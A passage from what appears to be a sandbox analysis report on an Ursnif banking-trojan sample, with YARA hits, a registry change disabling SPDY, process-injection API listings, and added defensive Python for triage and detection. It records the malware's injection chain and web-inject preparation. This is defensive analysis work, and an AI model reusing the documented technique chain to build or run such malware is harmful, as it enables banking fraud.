            http://www.rtl.de/favicon.ico
            http://www.servicios.clarin.com/
            http://www.shopzilla.com/
            http://www.sify.com/favicon.ico
            http://www.so-net.ne.jp/share/favicon.ico
            http://www.sogou.com/
            http://www.sogou.com/favicon.ico
            http://www.soso.com/
            http://www.soso.com/favicon.ico
            http://www.t-online.de/favicon.ico
            http://www.taobao.com/
            http://www.taobao.com/favicon.ico
            http://www.target.com/
            http://www.target.com/favicon.ico
            http://www.tchibo.de/
            http://www.tchibo.de/favicon.ico
            http://www.tesco.com/
            http://www.tesco.com/favicon.ico
            http://www.timesonline.co.uk/img/favicon.ico
            http://www.tiscali.it/favicon.ico
            http://www.univision.com/
            http://www.univision.com/favicon.ico
            http://www.walmart.com/
            http://www.walmart.com/favicon.ico
            http://www.ya.com/favicon.ico
            http://www.yam.com/favicon.ico
            http://www3.fnac.com/
            http://www3.fnac.com/favicon.ico
            http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
            http://z.about.com/m/a08.ico
            String found in binary or memory (explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp):
            http://www.fontbureau.com
            http://www.fontbureau.com/designers
            http://www.fontbureau.com/designers/?
            http://www.fontbureau.com/designers/cabarga.htmlN
            http://www.fontbureau.com/designers/frere-jones.html
            http://www.fontbureau.com/designers8
            http://www.fontbureau.com/designers?
            http://www.fontbureau.com/designersG
            http://www.fonts.com
            http://www.founder.com.cn/cn
            http://www.founder.com.cn/cn/bThe
            http://www.founder.com.cn/cn/cThe
            http://www.galapagosdesign.com/DPlease
            http://www.galapagosdesign.com/staff/dennis.htm
            http://www.goodfont.co.kr
            http://www.jiyu-kobo.co.jp/
            http://www.sajatypeworks.com
            http://www.sakkal.com
            http://www.sandoll.co.kr
            http://www.tiro.com
            http://www.typography.netD
            http://www.urwpp.deDPlease
            http://www.zhongyicts.com.cn
            String found in binary or memory (powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmp):
            https://contoso.com/
            https://contoso.com/Icon
            https://contoso.com/License
            https://nuget.org/nuget.exe
            String found in binary or memory (powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmp):
            https://github.com/Pester/Pester
            String found in binary or memory (powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmp):
            https://oneget.org
            https://oneget.orgX
            https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
            The two explorer.exe dumps are read-only regions of the host process: the first holds Internet Explorer search-provider and favicon entries, the second holds vendor URLs carried in font-file metadata. The powershell.exe strings come from the PowerShellGet/PackageManagement modules. None of these URLs is an indicator contributed by the sample; the trailing stray characters on some of them are string-extraction artifacts.

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Yara match: 00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.414892314.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.423836026.0000000004BDB000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 00000023.00000002.612829369.000002191303E000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 00000021.00000002.612699598.0000021DB8A3E000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.491033572.0000000004170000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.414853101.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.414912288.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 0000001F.00000000.532328464.0000000004E1E000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.414925514.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.414730489.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.414774270.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 00000003.00000003.414871579.0000000004D58000.00000004.00000040.sdmp (type: MEMORY)
            Yara match: 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 0000001F.00000002.622893274.0000000004E1E000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 00000003.00000002.515908651.00000000052D0000.00000040.00000001.sdmp (type: MEMORY)
            Yara match: 00000027.00000002.610642121.000002DACE3AE000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: 0000001C.00000003.499431243.0000027A6FE50000.00000004.00000001.sdmp (type: MEMORY)
            Yara match: Process Memory Space: control.exe PID: 4456 (type: MEMORY)
            Yara match: Process Memory Space: explorer.exe PID: 3440 (type: MEMORY)
            Yara match: Process Memory Space: powershell.exe PID: 1040 (type: MEMORY)
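The dump names in the match list encode where each YARA hit was taken. The following is an added example written for this page, not sandbox output or sample code: it decodes the Joe Sandbox dump name `<process>.<dump point>.<dump id>.<base>.<protection>.<type>.sdmp`, which is this editor's reading of the convention. Only the process index is confirmed by the report itself (0x1C = 28 is control.exe and 0x1F = 31 is explorer.exe, matching the `28_2_` and `31_2_` prefixes of the Code function lines below, and the explorer.exe hit at 0x04E1E000 falls inside the 0x04DE0000 to 0x04E2FFFF range those functions occupy). Treating the fifth field as Windows PAGE_* protection is an assumption; the sixth field is left undecoded.

```python
"""Decode Joe Sandbox memory-dump identifiers from a YARA match list and rank hits.

Field meanings (process index, dump point, dump id, base address, protection, type)
are the editor's reading of the naming convention; see the lead-in for what the
report itself confirms.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Constructed input: a subset of the YARA lines from this section, copied verbatim.
YARA_LINES = [
    "Source: Yara matchFile source: 00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000003.00000002.515908651.00000000052D0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: Process Memory Space: control.exe PID: 4456, type: MEMORY",
]

# Process index -> image, taken from this report (index 3 is not named in this section).
PROCESS_NAMES = {0x16: "powershell.exe", 0x1C: "control.exe", 0x1F: "explorer.exe"}

# Windows PAGE_* constants; assumption: the fifth name field is the region protection.
PAGE_NAMES = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}

DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<point>[0-9A-F]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})\.sdmp",
    re.I,
)


@dataclass(frozen=True)
class Dump:
    process_index: int
    dump_point: int
    dump_id: int
    base: int
    protection: int
    region_type: int  # left undecoded: the sandbox's own type code

    @property
    def process(self) -> str:
        return PROCESS_NAMES.get(self.process_index, f"process#{self.process_index}")

    @property
    def protection_name(self) -> str:
        return PAGE_NAMES.get(self.protection, hex(self.protection))

    @property
    def executable(self) -> bool:
        # PAGE_EXECUTE (0x10) .. PAGE_EXECUTE_WRITECOPY (0x80) all set a bit in 0xF0.
        return bool(self.protection & 0xF0)


def parse_dump(text: str) -> Dump | None:
    """Return the decoded dump name found in text, or None for process-space matches."""
    m = DUMP_RE.search(text)
    if not m:
        return None
    return Dump(
        int(m["proc"], 16), int(m["point"], 16), int(m["id"]),
        int(m["base"], 16), int(m["prot"], 16), int(m["type"], 16),
    )


def parse_yara_lines(lines: list[str]) -> list[Dump]:
    return [d for d in (parse_dump(line) for line in lines) if d is not None]


def triage(dumps: list[Dump]) -> tuple[Counter, list[Dump]]:
    """Hit count per process, plus the RWX regions: a loader that allocates, writes
    and then executes (the NtAllocate/NtWrite/NtProtect chain listed under System
    Summary) leaves its unpacked payload in memory with exactly this protection."""
    per_process = Counter(d.process for d in dumps)
    rwx = [d for d in dumps if d.protection == 0x40]
    return per_process, rwx


if __name__ == "__main__":
    dumps = parse_yara_lines(YARA_LINES)
    per_process, rwx = triage(dumps)
    for d in dumps:
        print(f"{d.process:15} base=0x{d.base:016X} {d.protection_name}")
    print("hits per process:", dict(per_process))
    print("RWX regions:", [f"0x{d.base:X}" for d in rwx])
```

Run against the full list above, the RWX hit is the 0x052D0000 region of process 3 (the `.00000040.` dump), while the control.exe, explorer.exe and powershell.exe hits are in read/write regions; the process-space matches carry no region data and are skipped.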

            E-Banking Fraud:

            Yara detected Ursnif (the same memory matches as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above)
            Disables SPDY (HTTP compression, likely to perform web injects)
            Source: C:\Windows\explorer.exe; Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, EnableSPDY3_0 = 0
            With SPDY off, Internet Explorer falls back to plain HTTP/1.1 requests, which the hooked browser functions can rewrite to inject content into banking pages. The value itself is a legitimate Internet Options setting; what stands out is that explorer.exe, not the browser, wrote it.
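Detection logic for this behaviour, as an added example written for this page (not part of the report or the sample): it runs over Sysmon Event ID 13 (RegistryEvent, value set) records and alerts when a process outside a small allow-list writes EnableSPDY3_0 = 0 under the per-user Internet Settings key. The sample events are constructed; the first mirrors the change recorded above. The allow-list of legitimate writers is an assumption to tune per environment.

```python
"""Flag a non-browser process disabling SPDY for the current user.

Input: Sysmon Event ID 13 records reduced to the fields the rule needs.
Example detection code written for this page, not from the sandbox or the sample.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample events. The first mirrors the change in this report
# (explorer.exe sets EnableSPDY3_0 to 0); the rest are benign or not value writes.
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 12, "EventType": "CreateKey", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0",
     "Details": ""},
]

# Any hive prefix (HKU\<SID>, HKCU, ...): only the tail of the path identifies the value.
SPDY_VALUE_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableSPDY3_0$", re.I)
# Sysmon renders DWORD data as "DWORD (0x00000000)".
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")
# Assumption to tune per environment: images that legitimately own this setting
# (the browser itself and the Internet Options dialog hosted by rundll32 inetcpl.cpl).
ALLOWED_WRITERS = {"iexplore.exe", "rundll32.exe"}


@dataclass(frozen=True)
class Alert:
    image: str
    target: str
    reason: str


def dword_value(details: str) -> int | None:
    m = DWORD_RE.search(details)
    return int(m.group(1), 16) if m else None


def detect_spdy_disable(events: list[dict]) -> list[Alert]:
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
            continue  # only value writes carry the data
        if not SPDY_VALUE_RE.search(ev["TargetObject"]):
            continue
        if dword_value(ev["Details"]) != 0:
            continue  # re-enabling SPDY is not the behaviour hunted here
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if image in ALLOWED_WRITERS:
            continue
        alerts.append(Alert(ev["Image"], ev["TargetObject"],
                            f"{image} disabled SPDY for the current user; a banking trojan "
                            "injected into a non-browser process does this before web injects"))
    return alerts


if __name__ == "__main__":
    for a in detect_spdy_disable(SAMPLE_EVENTS):
        print(a.image, "->", a.target, ":", a.reason)
```

Group Policy processing can also set this value, so in a managed estate add the policy engine's image to the allow-list rather than the value itself; the writer identity is the discriminator, not the registry path.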

            System Summary:

            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE3830 NtWriteVirtualMemory
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE387C NtCreateSection
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BDBAB4 NtAllocateVirtualMemory
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE1AC4 NtQueryInformationProcess
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BDCCA0 NtReadVirtualMemory
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFADD4 NtQueryInformationProcess
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BEF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BEFFCC NtMapViewOfSection
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00C11003 NtProtectVirtualMemory,NtProtectVirtualMemory
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DECCA0 NtReadVirtualMemory
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DFF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DFAD14 NtQuerySystemInformation
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DFFFCC NtMapViewOfSection
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF387C NtCreateSection
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF3830 NtWriteVirtualMemory
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF1AC4 NtQueryInformationProcess
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DEBAB4 NtAllocateVirtualMemory
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory
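The API-annotated Code function lines above are the raw material for two triage questions: which process-injection primitives does each process contain, and is the code in control.exe and explorer.exe the same module loaded at two different bases? The following is an added example written for this page, not sandbox output or sample code. It parses the report's line format (the trailing repeated id is the hyperlink anchor), groups APIs by process, and checks whether functions with identical API sequences in two processes differ by one constant address offset. The technique groupings are the editor's, and the input lines are copied from this section as constructed input.

```python
"""Profile injection primitives per process from sandbox 'Code function' lines
and detect the same module relocated across processes.

Example triage code written for this page; the technique groupings are the
editor's, not the sandbox's.
"""
from __future__ import annotations

import re
from collections import defaultdict

# Constructed input: API-annotated lines copied from this section plus one bare line.
CODE_FUNCTION_LINES = [
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00BE3830 NtWriteVirtualMemory,28_2_00BE3830",
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00BE387C NtCreateSection,28_2_00BE387C",
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00BDBAB4 NtAllocateVirtualMemory,28_2_00BDBAB4",
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00BEF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,28_2_00BEF560",
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00BEFFCC NtMapViewOfSection,28_2_00BEFFCC",
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00BF676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,28_2_00BF676C",
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00C11003 NtProtectVirtualMemory,NtProtectVirtualMemory,28_2_00C11003",
    r"Source: C:\Windows\System32\control.exeCode function: 28_2_00BFC16428_2_00BFC164",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04DF3830 NtWriteVirtualMemory,31_2_04DF3830",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04DF387C NtCreateSection,31_2_04DF387C",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04DEBAB4 NtAllocateVirtualMemory,31_2_04DEBAB4",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04DFF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,31_2_04DFF560",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04DFFFCC NtMapViewOfSection,31_2_04DFFFCC",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04E0676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,31_2_04E0676C",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory,31_2_04E21003",
    r"Source: C:\Windows\explorer.exeCode function: 31_2_04DFAD14 NtQuerySystemInformation,31_2_04DFAD14",
]

# Report line layout: "<image>Code function: <id> <api,api,...>,<id>". The trailing id is
# the hyperlink anchor; matching it by back-reference lets a bare line (no APIs) parse too.
LINE_RE = re.compile(
    r"Source: (?P<image>.+?)Code function: (?P<fid>(?P<pidx>\d+)_\d+_[0-9A-F]{8})"
    r"\s*(?P<apis>[A-Za-z0-9_,]*?),?(?P=fid)$")

# A module containing every API of a set has the primitives for that technique.
TECHNIQUES = {
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "remote write": {"NtAllocateVirtualMemory", "NtWriteVirtualMemory"},
    "remote thread start": {"CreateRemoteThread", "ResumeThread"},
    "thread context hijack": {"NtSetContextThread"},
}


def parse_code_functions(lines):
    """Return {process_index: {"image": str, "functions": {function_id: [apis]}}}."""
    procs = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        entry = procs.setdefault(int(m["pidx"]), {"image": m["image"], "functions": {}})
        entry["functions"][m["fid"]] = [a for a in m["apis"].split(",") if a]
    return procs


def injection_profile(procs):
    """Per process: (image, sorted technique names whose primitive set is fully present)."""
    profile = {}
    for pidx, entry in procs.items():
        seen = {api for apis in entry["functions"].values() for api in apis}
        profile[pidx] = (entry["image"], sorted(t for t, need in TECHNIQUES.items() if need <= seen))
    return profile


def _unique_signatures(functions):
    """API sequence -> address, for sequences that occur exactly once in the process."""
    by_sig = defaultdict(list)
    for fid, apis in functions.items():
        if apis:
            by_sig[tuple(apis)].append(int(fid.rsplit("_", 1)[1], 16))
    return {sig: addrs[0] for sig, addrs in by_sig.items() if len(addrs) == 1}


def relocation_delta(procs, a, b):
    """If every function shared between processes a and b sits at one constant address
    offset, both run the same injected module at different bases; return that offset."""
    sig_a = _unique_signatures(procs[a]["functions"])
    sig_b = _unique_signatures(procs[b]["functions"])
    deltas = {sig_b[s] - sig_a[s] for s in sig_a.keys() & sig_b.keys()}
    return deltas.pop() if len(deltas) == 1 else None


if __name__ == "__main__":
    procs = parse_code_functions(CODE_FUNCTION_LINES)
    for pidx, (image, techniques) in injection_profile(procs).items():
        print(f"{pidx:>3} {image}: {', '.join(techniques)}")
    delta = relocation_delta(procs, 28, 31)
    print("offset of explorer.exe copy relative to control.exe copy:",
          hex(delta) if delta is not None else "no single offset")
```

On this report every annotated function in control.exe (process 28) has a counterpart in explorer.exe (process 31) exactly 0x04210000 higher, so the two listings describe one payload module mapped at two bases, which is what the "Injects code into the Windows Explorer" signature in the overview also says. Both copies carry the full section-mapping, remote-write, remote-thread and thread-context chain.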
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFC164
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFA4BC
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF676C
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFE080
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF20F8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BD203C
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF0034
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF6064
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BEB040
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF91A0
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE9138
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BDC134
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE1174
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFF940
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF8224
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF3208
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE9380
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BD2BC8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BD7320
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BD8B5C
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE8B4C
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF94B8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE9CB0
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BED4A8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BDBCF8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE3CE0
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF74CC
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE0CC0
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BDD460
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE1D94
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE452C
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BEB520
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFB516
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BD6D08
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BF26B4
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFBEB0
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BDAE04
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BD37B8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BE17B8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BFAFB8
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BD9F98
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BEF770
            Source: C:\Windows\System32\control.exe; Code function: 28_2_00BDB75C
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0A4BC
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0AFB8
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DE37B8
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DEB75C
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0676C
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DFF770
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E00034
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E091A0
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0C164
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF9138
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DEC134
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF0CC0
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DEBCF8
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E074CC
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF3CE0
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E094B8
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF9CB0
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DFD4A8
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DE5474
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DED460
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF1D94
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DE6D08
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DF452C
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0B516
            Source: C:\Windows\explorer.exe; Code function: 31_2_04DFB520
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E0BEB0
            Source: C:\Windows\explorer.exe; Code function: 31_2_04E026B4
            Source: C:\Windows\explorer.exeCode function: 31_2_04DEAE0431_2_04DEAE04
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE9F9831_2_04DE9F98
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF17B831_2_04DF17B8
            Source: C:\Windows\explorer.exeCode function: 31_2_04E020F831_2_04E020F8
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0E08031_2_04E0E080
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0606431_2_04E06064
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFB04031_2_04DFB040
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE203C31_2_04DE203C
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0F94031_2_04E0F940
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF117431_2_04DF1174
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0822431_2_04E08224
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0320831_2_04E03208
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE2BC831_2_04DE2BC8
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF938031_2_04DF9380
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE8B5C31_2_04DE8B5C
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF8B4C31_2_04DF8B4C
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE732031_2_04DE7320
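The function addresses listed for control.exe (process 28) and explorer.exe (process 31) are not independent findings: every control.exe address reappears in explorer.exe shifted by the same constant, which is what one module mapped into two processes at different load addresses looks like. The script below is an added triage example, not part of the Joe Sandbox report. It parses a constructed subset of the lines above (copied in the raw extracted form, where the function id is doubled; the regex tolerates both that and the clean form), groups addresses by process, and recovers the base delta by voting over pairwise differences, so it also works when the two processes carry different numbers of functions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of the "Code function" lines from this report,
# copied as extracted. The second copy of each id is an extraction artifact.
REPORT_LINES = r"""
Source: C:\Windows\System32\control.exeCode function: 28_2_00BDBCF828_2_00BDBCF8
Source: C:\Windows\System32\control.exeCode function: 28_2_00BE3CE028_2_00BE3CE0
Source: C:\Windows\System32\control.exeCode function: 28_2_00BF74CC28_2_00BF74CC
Source: C:\Windows\System32\control.exeCode function: 28_2_00BE0CC028_2_00BE0CC0
Source: C:\Windows\System32\control.exeCode function: 28_2_00BDD46028_2_00BDD460
Source: C:\Windows\System32\control.exeCode function: 28_2_00BE1D9428_2_00BE1D94
Source: C:\Windows\explorer.exeCode function: 31_2_04E0A4BC31_2_04E0A4BC
Source: C:\Windows\explorer.exeCode function: 31_2_04DEBCF831_2_04DEBCF8
Source: C:\Windows\explorer.exeCode function: 31_2_04DF3CE031_2_04DF3CE0
Source: C:\Windows\explorer.exeCode function: 31_2_04E074CC31_2_04E074CC
Source: C:\Windows\explorer.exeCode function: 31_2_04DF0CC031_2_04DF0CC0
Source: C:\Windows\explorer.exeCode function: 31_2_04DED46031_2_04DED460
Source: C:\Windows\explorer.exeCode function: 31_2_04DF1D9431_2_04DF1D94
Source: C:\Windows\explorer.exeCode function: 31_2_04E0F94031_2_04E0F940
"""

# Joe Sandbox ids are <process>_<run>_<address>; anything after the 8 hex digits
# (such as the duplicated id) is ignored.
LINE_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)Code function:\s*(?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8})"
)


def parse_code_functions(text):
    """Return {(process id, image path): set of function addresses}."""
    funcs = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            funcs[(int(m["pid"]), m["image"].strip())].add(int(m["addr"], 16))
    return funcs


def relocation_delta(addrs_a, addrs_b):
    """Return (delta, votes): the single (b - a) shift that maps the most
    addresses of A onto B. For one module mapped at two bases this is the
    base difference and the vote count equals the number of shared functions."""
    votes = Counter(b - a for a in addrs_a for b in addrs_b)
    return votes.most_common(1)[0]


def shared_module_report(funcs, pid_a, pid_b):
    """Compare two processes' function sets and describe what they share."""
    a = next(s for (pid, _), s in funcs.items() if pid == pid_a)
    b = next(s for (pid, _), s in funcs.items() if pid == pid_b)
    delta, matched = relocation_delta(a, b)
    return {
        "delta": delta,
        "matched": matched,
        "total_a": len(a),
        "total_b": len(b),
        # functions seen in B that have no shifted counterpart in A
        "only_in_b": sorted(addr for addr in b if addr - delta not in a),
    }


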